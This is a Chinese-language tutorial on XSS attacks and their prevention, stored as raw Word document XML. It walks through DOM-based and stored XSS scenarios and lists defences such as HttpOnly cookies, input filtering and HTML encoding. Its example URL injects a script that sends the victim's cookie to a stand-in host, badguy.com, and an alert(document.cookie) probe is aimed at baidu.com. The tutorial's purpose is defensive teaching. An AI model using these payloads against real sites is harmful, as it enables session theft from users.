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D55EE9" w:rsidP="00D55EE9">
      <w:pPr>
        <w:pStyle w:val="a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XSS跨站脚本攻击</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B81382" w:rsidRPr="00B81382" w:rsidRDefault="00B81382" w:rsidP="00B81382">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B81382">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="555555"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>攻击过程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D55EE9" w:rsidRDefault="00DF58D8" w:rsidP="00D55EE9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DF58D8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XSS跨站脚本攻击指攻击者在网页中嵌入客户端脚本(例如JavaScript)，当用户浏览此网页时，脚本就会在用户的浏览器上执行，从而达到攻击者的目的，比如获取用户的Cookie，导航到恶意网站，携带木马等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF58D8" w:rsidRDefault="00A30622" w:rsidP="00D55EE9">
      <w:pP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A30622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XSS攻击场景有以下两个方面：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009142FE" w:rsidRPr="007C51B9" w:rsidRDefault="009142FE" w:rsidP="009142F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142FE">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dom-Based XSS 漏洞。攻击过程如下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C51B9" w:rsidRPr="007C51B9" w:rsidRDefault="007C51B9" w:rsidP="007C51B9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="420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7C51B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Tom 发现了Victim.com中的Search.asp页面有XSS漏洞，Search.asp的代码如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a7"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="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6"/>
      </w:tblGrid>
      <w:tr w:rsidR="007C51B9" w:rsidTr="007C51B9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7876" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w:rsidR="007C51B9" w:rsidRPr="007C51B9" w:rsidRDefault="007C51B9" w:rsidP="007C51B9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/>
                <w:color w:val="555555"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;html&gt;  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007C51B9" w:rsidRPr="007C51B9" w:rsidRDefault="007C51B9" w:rsidP="007C51B9">
            <w:pPr>
              <w:ind w:firstLineChars="200" w:firstLine="42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&lt;title&gt;&lt;/title&gt;  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007C51B9" w:rsidRPr="007C51B9" w:rsidRDefault="007C51B9" w:rsidP="007C51B9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&lt;body&gt;  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007C51B9" w:rsidRPr="007C51B9" w:rsidRDefault="007C51B9" w:rsidP="007C51B9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　　</w:t>
            </w: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Results  for  &lt;%Reequest.QueryString("term")%&gt;  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007C51B9" w:rsidRPr="007C51B9" w:rsidRDefault="007C51B9" w:rsidP="007C51B9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　　</w:t>
            </w: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...  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007C51B9" w:rsidRPr="007C51B9" w:rsidRDefault="007C51B9" w:rsidP="007C51B9">
            <w:pPr>
              <w:pStyle w:val="a6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 xml:space="preserve">&lt;/body&gt;  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007C51B9" w:rsidRPr="007C51B9" w:rsidRDefault="007C51B9" w:rsidP="007C51B9">
            <w:pPr>
              <w:pStyle w:val="a6"/>
              <w:ind w:firstLineChars="0" w:firstLine="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7C51B9">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Times New Roman"/>
                <w:color w:val="555555"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>&lt;/html&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="007C51B9" w:rsidRDefault="002B3345" w:rsidP="007C51B9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2B334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Tom 先建立一个网站http://badguy.com，用来接收“偷”来的信息。然后Tom 构造一个恶意的url(如下)，通过某种方式(邮件，QQ)发给Monica</w:t>
      </w:r>
      <w:r w:rsidR="00774785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。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00774785" w:rsidRDefault="001B1DB9" w:rsidP="007C51B9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7" w:history="1">
        <w:r w:rsidRPr="006B1112">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Times New Roman" w:hint="eastAsia"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://victim.com/search.asp?term=&lt;script&gt;window.open("http://badguy.com?cookie="+document.cookie)&lt;/script</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00774785" w:rsidRPr="001B1DB9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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B1DB9" w:rsidRPr="007C51B9" w:rsidRDefault="001B1DB9" w:rsidP="007C51B9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="420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Monica点击了这个URL，嵌入在URL中的恶意Javascript代码就会在Monica的浏览器中执行，那么Monica在victim.com网站的cookie，就会被发送到badguy网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站中，这样Monica在victim.com 的信息就被Tom盗了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C51B9" w:rsidRPr="001B1DB9" w:rsidRDefault="001B1DB9" w:rsidP="009142FE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Stored XSS(存储式XSS漏洞)。该类型是应用广泛而且有可能影响大Web服务器自身安全的漏洞，攻击者将攻击脚本上传到Web服务器上，使得所有访问该页面的用户都面临信息泄露的可能。 攻击过程如下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1B1DB9" w:rsidRDefault="00470B9E" w:rsidP="001B1DB9">
      <w:pPr>
        <w:pStyle w:val="a6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Alex发现了网站A上有一个XSS 漏洞，该漏洞允许将攻击代码保存在数据库中，于是Alex发布了一篇文章，文章中嵌入了恶意JavaScript代码。其他人如Monica访问这片文章的时候，嵌入在文章中的恶意Javascript代码就会在Monica的浏览器中执行，其会话cookie或者其他信息将被Alex盗走</w:t>
      </w:r>
      <w:r w:rsidR="00B95D34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B95D34" w:rsidRDefault="00B95D34" w:rsidP="001B1DB9">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:left="4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Dom-Based XSS漏洞威胁用户个体，而存储式XSS漏洞所威胁的对象将是大量的用户。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E6753C" w:rsidRDefault="00E6753C" w:rsidP="00B81382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555555"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B81382">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>防止XSS跨站脚本攻击</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00841BB2" w:rsidRDefault="00D849DF" w:rsidP="00841BB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原则：不相信用户输入的数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D849DF" w:rsidRDefault="00D849DF" w:rsidP="00841BB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注意：攻击代码不一定在&lt;script&gt;&lt;/script&gt;中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B53B43" w:rsidRDefault="00B53B43" w:rsidP="00B53B43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 w:rsidRPr="00B53B43">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将重要的cookie标记为http only，这样的话Javascript 中的document.cookie语句就不能获取到cookie了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E344E3" w:rsidRPr="00E344E3" w:rsidRDefault="00E344E3" w:rsidP="00E344E3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344E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只允许用户输入我们期望的数据。例如：年龄的textbox中，只允许用户输入数字，而数字之外的字符都过滤掉</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E344E3" w:rsidRDefault="00EE075A" w:rsidP="00B53B43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对数据进行Html Encode 处理。&lt; 转化为 &amp;lt;、&gt; 转化为 &amp;gt;、&amp; 转化为 &amp;amp;、' 转化为 &amp;#039;、" 转化为 &amp;quot;、空格 转化为 &amp;nbsp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00733F77" w:rsidRPr="00733F77" w:rsidRDefault="00733F77" w:rsidP="00733F77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33F7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过滤或移除特殊的Html标签。例如：&lt;script&gt;、&lt;iframe&gt;、&amp;lt; for &lt;、&amp;gt; for &gt;、&amp;quot for</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E1279" w:rsidRPr="009E1279" w:rsidRDefault="009E1279" w:rsidP="009E1279">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:line="36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E127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过滤JavaScript 事件的标签。例如 "onclick="、"onfocus" 等等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00733F77" w:rsidRDefault="00A362CA" w:rsidP="00A362C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很多浏览器都加入了安全机制来过滤XSS（如下图，在ie中输入</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00973E4A" w:rsidRPr="006B1112">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://www.baidu.com/s?wd=&lt;script&gt;alert(document.cookie)&lt;/script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&gt;）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00973E4A" w:rsidRDefault="00973E4A" w:rsidP="00A362C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306530"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="1" name="图片 1" descr="http://img.my.csdn.net/uploads/201212/23/1356257331_6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23/1356257331_65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B0F" w:rsidRPr="00B53B43" w:rsidRDefault="00845B0F" w:rsidP="00A362CA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0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00FE0546" w:rsidRPr="00B53B43" w:rsidRDefault="00FE0546" w:rsidP="00841BB2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00FE0546" w:rsidRPr="00B5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2BE" w:rsidRDefault="006602BE" w:rsidP="00D55EE9">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="006602BE" w:rsidRDefault="006602BE" w:rsidP="00D55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2BE" w:rsidRDefault="006602BE" w:rsidP="00D55EE9">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="006602BE" w:rsidRDefault="006602BE" w:rsidP="00D55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7731A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DB9C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16841"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD4A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B1592"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="744E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94288C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E99CA9F8"/>
    <w:lvl w:ilvl="0" w:tplc="C07607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C7558"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E99CA9F8"/>
    <w:lvl w:ilvl="0" w:tplc="C076071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4E2A84"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="737E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46"/>
    <w:rsid w:val="001B1DB9"/>
    <w:rsid w:val="002B3345"/>
    <w:rsid w:val="003C6446"/>
    <w:rsid w:val="00470B9E"/>
    <w:rsid w:val="004D403C"/>
    <w:rsid w:val="006602BE"/>
    <w:rsid w:val="00733F77"/>
    <w:rsid w:val="00774785"/>
    <w:rsid w:val="007C51B9"/>
    <w:rsid w:val="00841BB2"/>
    <w:rsid w:val="00845B0F"/>
    <w:rsid w:val="009142FE"/>
    <w:rsid w:val="00973E4A"/>
    <w:rsid w:val="009E1279"/>
    <w:rsid w:val="00A30622"/>
    <w:rsid w:val="00A362CA"/>
    <w:rsid w:val="00B53B43"/>
    <w:rsid w:val="00B81382"/>
    <w:rsid w:val="00B95D34"/>
    <w:rsid w:val="00D55EE9"/>
    <w:rsid w:val="00D849DF"/>
    <w:rsid w:val="00DF58D8"/>
    <w:rsid w:val="00E344E3"/>
    <w:rsid w:val="00E34679"/>
    <w:rsid w:val="00E6753C"/>
    <w:rsid w:val="00EE075A"/>
    <w:rsid w:val="00FE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83142-2925-423C-987B-A7F69199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1382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E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EE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55E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55EE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42FE"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="a7">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="007C5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B1DB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81382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3cscript%3ealert(document.cookie)%3c/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ctim.com/search.asp?term=%3cscript%3ewindow.open(%22http://badguy.com?cookie=%22+document.cookie)%3c/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25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-03-25T04:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-25T06:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>